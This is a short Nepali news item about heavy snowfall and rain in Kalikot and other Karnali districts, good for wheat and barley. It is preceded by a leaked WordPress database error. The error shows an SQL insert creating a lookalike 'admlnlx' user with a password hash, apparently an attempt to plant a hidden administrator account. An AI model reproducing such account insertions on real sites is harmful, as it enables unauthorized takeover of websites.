WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkVpqZOVDU.EwIhFuzQKLY.0NXmqs01', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:05:49', '', 'admlnlx', 'admlnlx')
कालीकोट,माघ १४ –
कालीकोट जिल्लामा वर्षासँगै भएको हिमपातले जनजीवन प्रभावित भएको छ ।
आज बिहानबाट आएको वर्षासँगै हिमपातले जिल्लाका माथिल्लो क्षेत्र धोलागोह, खिन, फोइमहादेव, ओदानकु, रुप्सा, जुविथा, चिल्खाया, छाप्रे,पाङ्खा र सदरमुकाम मान्मालगायतका गाविसमा भारी हिमपात भएपछि जनजीवन प्रभावित भएका छन् ।
बिहानैदेखि कालीकोट जिल्लालगायत कर्णालीका जुम्ला, मुगु, हुम्ला र डोल्पा जिल्लामा भारी हिमपात भइरहेको छ ।
हिमपातसँगै आएको वर्षाले कृषकमा खुसी ल्याएको छ । स्थानीय कृषकले लगाएको गहुँ तथा जौ बालीलाई बर्षाले राम्रो गर्ने हुँदा कृषकलाई राहत भएको छ । – रासस